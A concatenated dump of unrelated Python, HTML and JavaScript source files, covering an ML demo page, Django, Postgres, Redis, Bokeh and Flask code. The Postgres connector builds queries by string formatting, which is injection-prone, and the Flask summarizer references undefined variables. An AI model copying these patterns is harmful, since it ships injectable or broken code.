ctx.fillRect(0, 0, width + 10, 20);
ctx.fillStyle = "white";
ctx.fillText(prediction['class'], 5, 15);
}
"""
_DUMMY_PREDICTION_PROCESSING = """
function processPrediction(prediction) {
};
"""
_BOX_PREDICTION_PROCESSING = """
function processPrediction(prediction) {
var i;
var canvas = document.getElementById("outputCanvas");
var ctx = canvas.getContext("2d");
console.log(prediction);
for (i = 0; i < prediction['box_proposals'].length; i++) {
var box = prediction['box_proposals'][i].map(function (x) {
return parseInt(x, 10);
});
ctx.beginPath();
ctx.lineWidth = "6";
ctx.strokeStyle = "red";
ctx.rect(box[0], box[1], box[2] - box[0], box[3] - box[1]);
console.log(box[0], box[1], box[2] - box[0], box[3] - box[1]);
ctx.stroke();
//if ('class' in prediction) {
// ctx.font = "16px Arial";
// var width = ctx.measureText(prediction['class'][i]).width;
// ctx.fillStyle="red";
// ctx.fillRect(box[0], box[1] - 20, width, 20);
// ctx.fillStyle = "white";
// ctx.fillText(prediction['class'][i], box[0], box[1]);
//}
}
};
"""
_PAGE_TEMPLATE = Template("""
<html>
<head>
<title>
$title
</title>
<style>
$css
</style>
</head>
<body>
<div class="pane-container">
<div class="pane model">
<div class="pane__left model__input">
<div class="model__content">
<h2><span>$title</span></h2>
<div class="model__content">
<input type="file" class="inputfile" id="file" name="file" onchange="previewFile()"><br>
<label for="file" class="custom-file-upload">Choose a file</label>
</div>
</div>
</div>
<div class="pane__right model__output model__output--empty">
<div class="pane__thumb"></div>
<div class="model__content">
<div id="output" class="output">
<div class="placeholder">
<div class="placeholder__content">
<canvas id="outputCanvas" width="512" height="512" style="border:1px solid #d3d3d3;">
</canvas>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
<script>
$process_prediction
function previewFile(){
//var preview = document.querySelector('img'); //selects the query named img
var file = document.querySelector('input[type=file]').files[0]; //sames as here
var reader = new FileReader();
reader.onloadend = function () {
var c = document.getElementById("outputCanvas");
var ctx = c.getContext("2d");
ctx.clearRect(0, 0, c.width, c.height);
var base_image = new Image();
base_image.src = reader.result;
base_image.onload = function(){
ctx.drawImage(base_image, 0, 0, 512, 512);
};
console.log(typeof(reader.result));
//console.log(reader.result);
var xhr = new XMLHttpRequest();
xhr.open('POST', '/predict');
//xhr.responseType = 'blob';
xhr.setRequestHeader('Content-Type', 'image/jpeg');
xhr.onload = function() {
var prediction = JSON.parse(xhr.responseText)
processPrediction(prediction);
};
xhr.send(reader.result);
}
if (file) {
reader.readAsDataURL(file); //reads the data as a URL
} else {
//preview.src = "";
}
};
previewFile();
</script>
</html>
""")
_SINGLE_INPUT_TEMPLATE = Template("""
<div class="form__field">
<label for="input-$field_name">$field_name</label>
<input type="text" id="input-$field_name" type="text" required value placeholder="input goes here">
</div>
""")
_CSS = """
body,
html {
min-width: 48em;
background: #f9fafc;
font-size: 16px
}
* {
font-family: sans-serif;
color: #232323
}
input[type="file"] {
display: none;
}
.custom-file-upload {
border: 1px solid #ccc;
display: inline-block;
padding: 6px 12px;
cursor: pointer;
}
section {
background: #fff
}
code,
code span,
pre,
.output {
font-family: 'Roboto Mono', monospace!important
}
code {
background: #f6f8fa
}
li,
p,
td,
th {
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
font-size: 1.125em;
line-height: 1.5em;
margin: 1.2em 0
}
pre {
margin: 2em 0
}
h1,
h2 {
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
font-weight: 300
}
h2 {
font-size: 2em;
color: rgba(35, 35, 35, .75)
}
img {
max-width: 100%
}
hr {
display: block;
border: none;
height: .375em;
background: #f6f8fa
}
blockquote,
hr {
margin: 2.4em 0
}
.btn {
text-decoration: none;
cursor: pointer;
text-transform: uppercase;
font-size: 1em;
margin: 0;
-moz-appearance: none;
-webkit-appearance: none;
border: none;
color: #fff!important;
display: block;
background: #2085bc;
padding: .9375em 3.625em;
-webkit-transition: background-color .2s ease, opacity .2s ease;
transition: background-color .2s ease, opacity .2s ease
}
.btn.btn--blue {
background: #2085bc
}
.btn:focus,
.btn:hover {
background: #40affd;
outline: 0
}
.btn:focus {
box-shadow: 0 0 1.25em rgba(50, 50, 150, .05)
}
.btn:active {
opacity: .66;
background: #2085bc;
-webkit-transition-duration: 0s;
transition-duration: 0s
}
.btn:disabled,
.btn:disabled:active,
.btn:disabled:hover {
cursor: default;
background: #d0dae3
}
form {
display: block
}
.form__field {
-webkit-transition: margin .2s ease;
transition: margin .2s ease
}
.form__field+.form__field {
margin-top: 2.5em
}
.form__field label {
display: block;
font-weight: 600;
font-size: 1.125em
}
.form__field label+* {
margin-top: 1.25em
}
.form__field input[type=text],
.form__field textarea {
-moz-appearance: none;
-webkit-appearance: none;
width: 100%;
font-size: 1em;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
padding: .8125em 1.125em;
color: #232323;
border: .125em solid #d4dce2;
display: block;
box-sizing: border-box;
-webkit-transition: background-color .2s ease, color .2s ease, border-color .2s ease, opacity .2s ease;
transition: background-color .2s ease, color .2s ease, border-color .2s ease, opacity .2s ease
}
.form__field input[type=text]::-webkit-input-placeholder,
.form__field textarea::-webkit-input-placeholder {
color: #b4b4b4
}
.form__field input[type=text]:-moz-placeholder,
.form__field textarea:-moz-placeholder {
color: #b4b4b4
}
.form__field input[type=text]::-moz-placeholder,
.form__field textarea::-moz-placeholder {
color: #b4b4b4
}
.form__field input[type=text]:-ms-input-placeholder,
.form__field textarea:-ms-input-placeholder {
color: #b4b4b4
}
.form__field input[type=text]:focus,
.form__field textarea:focus {
outline: 0;
border-color: #63a7d4;
box-shadow: 0 0 1.25em rgba(50, 50, 150, .05)
}
.form__field textarea {
resize: vertical;
min-height: 8.25em
}
.form__field .btn {
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
-webkit-touch-callout: none
}
.form__field--btn {
display: -webkit-box;
display: -ms-flexbox;
display: -webkit-flex;
display: flex;
-webkit-flex-direction: row;
-ms-flex-direction: row;
-webkit-box-orient: horizontal;
-webkit-box-direction: normal;
flex-direction: row;
-webkit-justify-content: flex-end;
-ms-justify-content: flex-end;
-webkit-box-pack: end;
-ms-flex-pack: end;
justify-content: flex-end
}
@media screen and (max-height:760px) {
.form__instructions {
margin: 1.875em 0 1.125em
}
.form__field:not(.form__field--btn)+.form__field:not(.form__field--btn) {
margin-top: 1.25em
}
}
body,
html {
width: 100%;
height: 100%;
margin: 0;
padding: 0;
font-family: 'Source Sans Pro', sans-serif
}
h1 {
font-weight: 300
}
.model__output {
background: #fff
}
.model__output.model__output--empty {
background: 0 0
}
.placeholder {
width: 100%;
height: 100%;
display: -webkit-box;
display: -ms-flexbox;
display: -webkit-flex;
display: flex;
-webkit-align-items: center;
-ms-flex-align: center;
-webkit-box-align: center;
align-items: center;
-webkit-justify-content: center;
-ms-justify-content: center;
-webkit-box-pack: center;
-ms-flex-pack: center;
justify-content: center;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
-webkit-touch-callout: none;
cursor: default
}
.placeholder .placeholder__content {
display: -webkit-box;
display: -ms-flexbox;
display: -webkit-flex;
display: flex;
-webkit-flex-direction: column;
-ms-flex-direction: column;
-webkit-box-orient: vertical;
-webkit-box-direction: normal;
flex-direction: column;
-webkit-align-items: center;
-ms-flex-align: center;
-webkit-box-align: center;
align-items: center;
text-align: center
}
.placeholder svg {
display: block
}
.placeholder svg.placeholder__empty,
.placeholder svg.placeholder__error {
width: 6em;
height: 3.625em;
fill: #e1e5ea;
margin-bottom: 2em
}
.placeholder svg.placeholder__error {
width: 4.4375em;
height: 4em
}
.placeholder p {
font-size: 1em;
margin: 0;
padding: 0;
color: #9aa8b2
}
.placeholder svg.placeholder__working {
width: 3.4375em;
height: 3.4375em;
-webkit-animation: working 1s infinite linear;
animation: working 1s infinite linear
}
@-webkit-keyframes working {
0% {
-webkit-transform: rotate(0deg)
}
100% {
-webkit-transform: rotate(360deg)
}
}
@keyframes working {
0% {
-webkit-transform: rotate(0deg);
-ms-transform: rotate(0deg);
transform: rotate(0deg)
}
100% {
-webkit-transform: rotate(360deg);
-ms-transform: rotate(360deg);
transform: rotate(360deg)
}
}
.model__content {
padding: 1.875em 2.5em;
margin: auto;
-webkit-transition: padding .2s ease;
transition: padding .2s ease
}
.model__content:not(.model__content--srl-output) {
max-width: 61.25em
}
.model__content h2 {
margin: 0;
padding: 0;
font-size: 1em
}
.model__content h2 span {
font-size: 2em;
color: rgba(35, 35, 35, .75)
}
.model__content h2 .tooltip,
.model__content h2 span {
vertical-align: top
}
.model__content h2 span+.tooltip {
margin-left: .4375em
}
.model__content>h2:first-child {
margin: -.25em 0 0 -.03125em
}
.model__content__summary {
font-size: 1em;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
padding: 1.25em;
background: #f6f8fa
}
@media screen and (min-height:800px) {
.model__content {
padding-top: 4.6vh;
padding-bottom: 4.6vh
}
}
.pane-container {
display: -webkit-box;
display: -ms-flexbox;
display: -webkit-flex;
display: flex;
-webkit-flex-direction: column;
-ms-flex-direction: column;
-webkit-box-orient: vertical;
-webkit-box-direction: normal;
flex-direction: column;
height: 100%
}
.pane {
display: -webkit-box;
display: -ms-flexbox;
display: -webkit-flex;
display: flex;
-webkit-flex-direction: row;
-ms-flex-direction: row;
-webkit-box-orient: horizontal;
-webkit-box-direction: normal;
flex-direction: row;
position: relative;
-webkit-box-flex: 2;
-webkit-flex: 2;
-ms-flex: 2;
flex: 2;
height: auto;
min-height: 100%;
min-height: 34.375em
}
.pane__left,
.pane__right {
width: 100%;
height: 100%;
-webkit-align-self: stretch;
-ms-flex-item-align: stretch;
align-self: stretch;
min-width: 24em;
min-height: 34.375em
}
.pane__left {
height: auto;
min-height: 100%
}
.pane__right {
width: 100%;
overflow: auto;
height: auto;
min-height: 100%
}
.pane__right .model__content.model__content--srl-output {
display: inline-block;
margin: auto
}
.pane__thumb {
height: auto;
min-height: 100%;
margin-left: -.625em;
position: absolute;
width: 1.25em
}
.pane__thumb:after {
display: block;
position: absolute;
height: 100%;
top: 0;
content: "";
width: .25em;
background: #e1e5ea;
left: .5em
}
"""
def _html(title: str, field_names: List[str], task: str) -> str:
"""
Returns bare bones HTML for serving up an input form with the
specified fields that can render predictions from the configured model.
"""
# inputs = ''.join(_SINGLE_INPUT_TEMPLATE.substitute(field_name=field_name)
# for field_name in field_names)
inputs = ""
# quoted_field_names = [f"'{field_name}'" for field_name in field_names]
# quoted_field_list = f"[{','.join(quoted_field_names)}]"
if task == 'classification':
process_fun = _CLASSIFIER_PREDICTION_PROCESSING
elif task == 'detection':
process_fun = _BOX_PREDICTION_PROCESSING
else:
process_fun = _DUMMY_PREDICTION_PROCESSING
return _PAGE_TEMPLATE.substitute(title=title,
css=_CSS,
inputs=inputs,
qfl="",
process_prediction=process_fun)
if __name__ == "__main__":
main(sys.argv[1:])
|
py
|
1a5ee51a8711ffafd4c508e6104b133155743418
|
from django.urls import path
from . import views
app_name = 'polls'
urlpatterns = [
path('',views.IndexView.as_view(), name="index"),
path('<int:pk>/', views.DetailView.as_view(), name="detail"),
path('<int:pk>/results/', views.ResultsView.as_view(), name="results"),
path('<int:question_id>/vote/', views.vote, name="vote"),
]
|
py
|
1a5ee5232a38b58c0a63a73c93c694e9c626b403
|
import psycopg2
import psycopg2.extras
from Infrastructure import log
logger = log.get_logger("Postgres")
class Connector:
def __init__(self, config):
self.host = config['hostname']
self.database = config['database']
self.user = config['username']
self.password = config['password']
self.connection = None
def connect(self):
i = 1
while not self.connection:
try:
self.connection = psycopg2.connect(host=self.host,
database=self.database,
user=self.user,
password=self.password)
except Exception as e:
i += 1
logger.info("Error postgres connection " + str(e))
logger.info("Connect postgres " + str(i))
if i > 10:
break
def execute_with_results(self, query, params={}, as_dict=False):
query = query.format(**params)
self.connect()
if as_dict:
cursor = self.connection.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
else:
cursor = self.connection.cursor()
cursor.execute(query)
data = cursor.fetchall()
self.connection.commit()
cursor.close()
self.close()
if as_dict:
data = list(map(lambda r: dict(r), data))
return data
def execute_with_results_generic(self, query):
self.connect()
cursor = self.connection.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
cursor.execute(query)
rowcount = cursor.rowcount
try:
data = list(cursor.fetchall())
except Exception as ex:
data = []
self.connection.commit()
cursor.close()
return [data, rowcount]
def execute_multiple_queries_select_dict_response(self, store_procedure, params={}):
procedure = open(store_procedure, 'r').read()
sql_command = procedure.format(**params)
sqllist = sql_command.split(";")[:-1]
selects = []
for sql_c in sqllist:
selected = self.execute_with_results_generic(sql_c)
selects.append(selected)
return selects
def close(self):
if self.connection:
self.connection.close()
self.connection = None
|
py
|
1a5ee584f524f784537884872eec139b04ddc092
|
# Copyright 2012 Matt Chaput. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
from whoosh.matching.mcore import *
from whoosh.matching.binary import *
from whoosh.matching.wrappers import *
from whoosh.matching.combo import *
|
py
|
1a5ee62cf233030681ba27b60b7cbd8785979bd2
|
import pandas as pd
from bokeh.io import output_file, show
from bokeh.models import (BasicTicker, ColorBar, ColumnDataSource,
LinearColorMapper, PrintfTickFormatter,)
from bokeh.plotting import figure
from bokeh.sampledata.unemployment1948 import data
from bokeh.transform import transform
output_file("unemploymemt.html")
data.Year = data.Year.astype(str)
data = data.set_index('Year')
data.drop('Annual', axis=1, inplace=True)
data.columns.name = 'Month'
# reshape to 1D array or rates with a month and year for each row.
df = pd.DataFrame(data.stack(), columns=['rate']).reset_index()
source = ColumnDataSource(df)
# this is the colormap from the original NYTimes plot
colors = ["#75968f", "#a5bab7", "#c9d9d3", "#e2e2e2", "#dfccce", "#ddb7b1", "#cc7878", "#933b41", "#550b1d"]
mapper = LinearColorMapper(palette=colors, low=df.rate.min(), high=df.rate.max())
p = figure(plot_width=800, plot_height=300, title="US unemployment 1948—2016",
x_range=list(data.index), y_range=list(reversed(data.columns)),
toolbar_location=None, tools="", x_axis_location="above")
p.rect(x="Year", y="Month", width=1, height=1, source=source,
line_color=None, fill_color=transform('rate', mapper))
color_bar = ColorBar(color_mapper=mapper, location=(0, 0),
ticker=BasicTicker(desired_num_ticks=len(colors)),
formatter=PrintfTickFormatter(format="%d%%"))
p.add_layout(color_bar, 'right')
p.axis.axis_line_color = None
p.axis.major_tick_line_color = None
p.axis.major_label_text_font_size = "7px"
p.axis.major_label_standoff = 0
p.xaxis.major_label_orientation = 1.0
show(p)
|
py
|
1a5ee786c90e434502371e64e848b5c631b11927
|
from __future__ import absolute_import
import functools
import logging
import posixpath
import six
from threading import Lock
import rb
from django.utils.functional import SimpleLazyObject
from pkg_resources import resource_string
from redis.client import Script, StrictRedis
from redis.connection import ConnectionPool
from redis.exceptions import ConnectionError, BusyLoadingError
from rediscluster import StrictRedisCluster
from sentry import options
from sentry.exceptions import InvalidConfiguration
from sentry.utils import warnings
from sentry.utils.warnings import DeprecatedSettingWarning
from sentry.utils.versioning import Version, check_versions
from sentry.utils.compat import map
logger = logging.getLogger(__name__)
_pool_cache = {}
_pool_lock = Lock()
def _shared_pool(**opts):
if "host" in opts:
key = "%s:%s/%s" % (opts["host"], opts["port"], opts["db"])
else:
key = "%s/%s" % (opts["path"], opts["db"])
pool = _pool_cache.get(key)
if pool is not None:
return pool
with _pool_lock:
pool = _pool_cache.get(key)
if pool is not None:
return pool
pool = ConnectionPool(**opts)
_pool_cache[key] = pool
return pool
_make_rb_cluster = functools.partial(rb.Cluster, pool_cls=_shared_pool)
def make_rb_cluster(*args, **kwargs):
# This uses the standard library `warnings`, since this is provided for
# plugin compatibility but isn't actionable by the system administrator.
import warnings
warnings.warn(
"Direct Redis cluster construction is deprecated, please use named clusters. "
"Direct cluster construction will be removed in Sentry 8.5.",
DeprecationWarning,
)
return _make_rb_cluster(*args, **kwargs)
class _RBCluster(object):
def supports(self, config):
return not config.get("is_redis_cluster", False)
def factory(self, **config):
# rb expects a dict of { host, port } dicts where the key is the host
# ID. Coerce the configuration into the correct format if necessary.
hosts = config["hosts"]
hosts = {k: v for k, v in enumerate(hosts)} if isinstance(hosts, list) else hosts
config["hosts"] = hosts
return _make_rb_cluster(**config)
def __str__(self):
return "Redis Blaster Cluster"
class RetryingStrictRedisCluster(StrictRedisCluster):
"""
Execute a command with cluster reinitialization retry logic.
Should a cluster respond with a ConnectionError or BusyLoadingError the
cluster nodes list will be reinitialized and the command will be executed
again with the most up to date view of the world.
"""
def execute_command(self, *args, **kwargs):
try:
return super(self.__class__, self).execute_command(*args, **kwargs)
except (
ConnectionError,
BusyLoadingError,
KeyError, # see: https://github.com/Grokzen/redis-py-cluster/issues/287
):
self.connection_pool.nodes.reset()
return super(self.__class__, self).execute_command(*args, **kwargs)
class _RedisCluster(object):
def supports(self, config):
# _RedisCluster supports two configurations:
# * Explicitly configured with is_redis_cluster. This mode is for real redis-cluster.
# * No is_redis_cluster, but only 1 host. This represents a singular node Redis running
# in non-cluster mode.
return config.get("is_redis_cluster", False) or len(config.get("hosts")) == 1
def factory(self, **config):
# StrictRedisCluster expects a list of { host, port } dicts. Coerce the
# configuration into the correct format if necessary.
hosts = config.get("hosts")
# TODO(joshuarli): modernize dict_six fixer
hosts = list(hosts.values()) if isinstance(hosts, dict) else hosts
# Redis cluster does not wait to attempt to connect. We'd prefer to not
# make TCP connections on boot. Wrap the client in a lazy proxy object.
def cluster_factory():
if config.get("is_redis_cluster", False):
return RetryingStrictRedisCluster(
startup_nodes=hosts,
decode_responses=True,
skip_full_coverage_check=True,
max_connections=16,
max_connections_per_node=True,
)
else:
host = hosts[0].copy()
host["decode_responses"] = True
return StrictRedis(**host)
return SimpleLazyObject(cluster_factory)
def __str__(self):
return "Redis Cluster"
class ClusterManager(object):
def __init__(self, options_manager, cluster_type=_RBCluster):
self.__clusters = {}
self.__options_manager = options_manager
self.__cluster_type = cluster_type()
def get(self, key):
cluster = self.__clusters.get(key)
if cluster:
return cluster
# TODO: This would probably be safer with a lock, but I'm not sure
# that it's necessary.
configuration = self.__options_manager.get("redis.clusters").get(key)
if configuration is None:
raise KeyError(u"Invalid cluster name: {}".format(key))
if not self.__cluster_type.supports(configuration):
raise KeyError(u"Invalid cluster type, expected: {}".format(self.__cluster_type))
cluster = self.__clusters[key] = self.__cluster_type.factory(**configuration)
return cluster
# TODO(epurkhiser): When migration of all rb cluster to true redis clusters has
# completed, remove the rb ``clusters`` module variable and rename
# redis_clusters to clusters.
clusters = ClusterManager(options.default_manager)
redis_clusters = ClusterManager(options.default_manager, _RedisCluster)
def get_cluster_from_options(setting, options, cluster_manager=clusters):
cluster_option_name = "cluster"
default_cluster_name = "default"
cluster_constructor_option_names = frozenset(("hosts",))
options = options.copy()
cluster_options = {
key: options.pop(key)
for key in set(options.keys()).intersection(cluster_constructor_option_names)
}
if cluster_options:
if cluster_option_name in options:
raise InvalidConfiguration(
u"Cannot provide both named cluster ({!r}) and cluster configuration ({}) options.".format(
cluster_option_name, ", ".join(map(repr, cluster_constructor_option_names))
)
)
else:
warnings.warn(
DeprecatedSettingWarning(
u"{} parameter of {}".format(
", ".join(map(repr, cluster_constructor_option_names)), setting
),
u'{}["{}"]'.format(setting, cluster_option_name),
removed_in_version="8.5",
),
stacklevel=2,
)
cluster = rb.Cluster(pool_cls=_shared_pool, **cluster_options)
else:
cluster = cluster_manager.get(options.pop(cluster_option_name, default_cluster_name))
return cluster, options
def get_dynamic_cluster_from_options(setting, config):
cluster_name = config.get("cluster", "default")
cluster_opts = options.default_manager.get("redis.clusters").get(cluster_name)
if cluster_opts is not None and cluster_opts.get("is_redis_cluster"):
# RedisCluster
return True, redis_clusters.get(cluster_name), config
# RBCluster
return (False,) + get_cluster_from_options(setting, config)
def validate_dynamic_cluster(is_redis_cluster, cluster):
try:
if is_redis_cluster:
cluster.ping()
else:
with cluster.all() as client:
client.ping()
except Exception as e:
raise InvalidConfiguration(six.text_type(e))
def check_cluster_versions(cluster, required, recommended=None, label=None):
try:
with cluster.all() as client:
results = client.info()
except Exception as e:
# Any connection issues should be caught here.
raise InvalidConfiguration(six.text_type(e))
versions = {}
for id, info in results.value.items():
host = cluster.hosts[id]
# NOTE: This assumes there is no routing magic going on here, and
# all requests to this host are being served by the same database.
key = u"{host}:{port}".format(host=host.host, port=host.port)
versions[key] = Version(map(int, info["redis_version"].split(".", 3)))
check_versions(
"Redis" if label is None else "Redis (%s)" % (label,), versions, required, recommended
)
def load_script(path):
script = Script(None, resource_string("sentry", posixpath.join("scripts", path)))
# This changes the argument order of the ``Script.__call__`` method to
# encourage using the script with a specific Redis client, rather
# than implicitly using the first client that the script was registered
# with. (This can prevent lots of bizarre behavior when dealing with
# clusters of Redis servers.)
def call_script(client, keys, args):
u"""
Executes {!r} as a Lua script on a Redis server.
Takes the client to execute the script on as the first argument,
followed by the values that will be provided as ``KEYS`` and ``ARGV``
to the script as two sequence arguments.
""".format(
path
)
return script(keys, args, client)
return call_script
|
py
|
1a5ee7a39b3f8b46bf09ab68705d9d03a767ec46
|
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
CREATE_USER_URL = reverse('user:create')
TOKEN_URL = reverse('user:token')
ME_URL = reverse('user:me')
def create_user(**params):
"""Helper function to create new user"""
return get_user_model().objects.create_user(**params)
class PublicUserApiTests(TestCase):
"""Test the users API (public)"""
def setUp(self):
self.client = APIClient()
def test_create_valid_user_success(self):
"""Test creating using with a valid payload is successful"""
payload = {
'email': '[email protected]',
'password': 'testpass',
'name': 'name',
}
res = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
user = get_user_model().objects.get(**res.data)
self.assertTrue(
user.check_password(payload['password'])
)
self.assertNotIn('password', res.data)
def test_user_exists(self):
"""Test creating a user that already exists fails"""
payload = {'email': '[email protected]', 'password': 'testpass'}
create_user(**payload)
res = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_password_too_short(self):
"""Test that password must be more than 5 characters"""
payload = {'email': '[email protected]', 'password': 'pw'}
res = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
user_exists = get_user_model().objects.filter(
email=payload['email']
).exists()
self.assertFalse(user_exists)
def test_create_token_for_user(self):
"""Test that a token is created for the user"""
payload = {'email': '[email protected]', 'password': 'testpass'}
create_user(**payload)
res = self.client.post(TOKEN_URL, payload)
self.assertIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_create_token_invalid_credentials(self):
"""Test that token is not created if invalid credentials are given"""
create_user(email='[email protected]', password='testpass')
payload = {'email': '[email protected]', 'password': 'wrong'}
res = self.client.post(TOKEN_URL, payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_no_user(self):
"""Test that token is not created if user doesn't exist"""
payload = {'email': '[email protected]', 'password': 'teststest'}
res = self.client.post(TOKEN_URL, payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_missing_field(self):
"""Test that password is required"""
res = self.client.post(TOKEN_URL, {'email': 'one', 'password': ''})
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_user_unauthorized(self):
"""Test that authentication is required for users"""
res = self.client.get(ME_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateUserApiTests(TestCase):
"""Test API requests that require authentication"""
def setUp(self):
self.user = create_user(
email='[email protected]',
password='testpass',
name='name'
)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
def test_retrieve_profile_success(self):
"""Test retrieving profile for logged in user"""
res = self.client.get(ME_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, {
'name': self.user.name,
'email': self.user.email
})
def test_post_me_not_allowed(self):
"""Test that POST is not allowed on the me url"""
res = self.client.post(ME_URL, {})
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_user_profile(self):
"""Test updating the user profile for authenticated user"""
payload = {'name': 'new name', 'password': 'newpass'}
res = self.client.patch(ME_URL, payload)
self.user.refresh_from_db()
self.assertEqual(self.user.name, payload['name'])
self.assertTrue(self.user.check_password(payload['password']))
self.assertEqual(res.status_code, status.HTTP_200_OK)
|
py
|
1a5ee7b1363e0f5296434bbb193566b0a7214ab1
|
if __name__ == '__main__' and __package__ is None:
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.dirname(path.abspath(__file__)))))
import os
import argparse
from mnist_model import MnistModel
from common.TFLearn.optimizer import Optimizer
from utct.TFLearn.converter import Converter
def parse_args():
parser = argparse.ArgumentParser(
description='Export TFLearn model parameters to h5 file',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--checkpoint-dir',
dest='checkpoint_dir',
help='Path to checkpoint files',
required=True,
type=str)
parser.add_argument(
'--file',
dest='file_name',
help='File name of checkpoint file',
required=True,
type=str)
parser.add_argument(
'--output',
dest='dst_filepath',
help='Output file for TFLearn model parameters',
required=True,
type=str)
args = parser.parse_args()
return args
def main():
args = parse_args()
model = MnistModel()
optimizer = Optimizer()
Converter.export_to_h5(
model=model,
optimizer=optimizer,
checkpoint_path=os.path.join(args.checkpoint_dir, args.file_name),
dst_filepath=args.dst_filepath)
if __name__ == '__main__':
main()
|
py
|
1a5ee809f4809f3567b0e5de2b3731c854541c5e
|
from flask import Flask, request, render_template
import json
import numpy as np
import pandas as pd
import nltk
import networkx
from nltk.tokenize import sent_tokenize
from sklearn.metrics.pairwise import cosine_similarity
from nltk.corpus import stopwords
import jinja2
jinja_environment = jinja2.Environment(autoescape=True,loader=jinja2.FileSystemLoader('templates'))
nltk.download('punkt') # one time execution
nltk.download('stopwords')
app = Flask(__name__)
@app.route('/')
def static_page():
return render_template('index.html')
def script(): # single domain multiple documentation article
# single domain multiple documentation article
df = pd.read_csv(r'C:\Users\samanvayvajpayee\Downloads\tennis_articles_v4.csv', encoding='utf-8')
sentences = []
for s in df['article_text']:
sentences.append(sent_tokenize(s))
sentences = [y for x in sentences for y in x]
# Extract word vectors
# GloVe- word embeddings are vector representation of words.
# using GloVe also for maintaining the order
word_embeddings = {}
# f = open(r'Desktop\textrank\glove.6B.100d.txt', encoding='utf-8') #Download glove.6B.100d.txt embedding and replace the file address accordingly
for line in f:
values = line.split()
word = values[0]
coefs = np.asarray(values[1:], dtype="float32")
word_embeddings[word] = coefs
f.close()
# remove punctuations, numbers and special characters
clean_sentences = pd.Series(sentences).str.replace("[^a-zA-Z]", " ")
# make alphabets lowercase
clean_sentences = [s.lower() for s in clean_sentences]
# function to remove stopwords
def remove_stop_words(sen, lang='English'):
stop_words = stopwords.words(lang)
sentence_new = " ".join([i for i in sen if i not in stop_words])
return sentence_new
# remove stopwords
clean_sentences = [remove_stop_words(r.split()) for r in clean_sentences]
# create a word-vector each with size 100 of each sentence
sentence_vectors = []
for sen in clean_sentences:
if len(sen) != 0:
v = sum([word_embeddings.get(w, np.zeros((100,))) for w in sen.split()])/(len(sen.split())+0.001)
else:
v = np.zeros((100,))
sentence_vectors.append(v)
# similarity matrix
sim_mat = np.zeros([len(sentences), len(sentences)])
# cosine similarity to check similarity between sentences
for i in range(len(sentences)):
for j in range(len(sentences)):
if i != j:
sim_mat[i][j] = cosine_similarity(sentence_vectors[i].reshape(1, 100),
sentence_vectors[j].reshape(1, 100))[0, 0]
# making a graph by applying pageRank algo
nx_graph = networkx.from_numpy_array(sim_mat)
scores = networkx.pagerank(nx_graph)
ranked_scores = sorted(((scores[i], s) for i,s in enumerate(sentences)), reverse=True)
# Extract top 2 sentences as the summary
for i in range(3):
s+=(ranked_scores[i][1])
return s
summ=""
@app.route("/script", methods=['GET','POST'])
def summarize():
#if request.method == 'GET':
# input_string = request.form['text']
#if request.method == 'POST':
# request.form['sum']
summ = script()
return render_template('index.html', summary=summ)
if __name__ == "__main__":
app.run()
|
py
|
1a5ee88860c830db179ec14d63f5c19bbc9b6b21
|
"""Tests for the plots.py submodule."""
import asyncio
from datetime import datetime
from pathlib import Path
from lsw_slackbot import plots
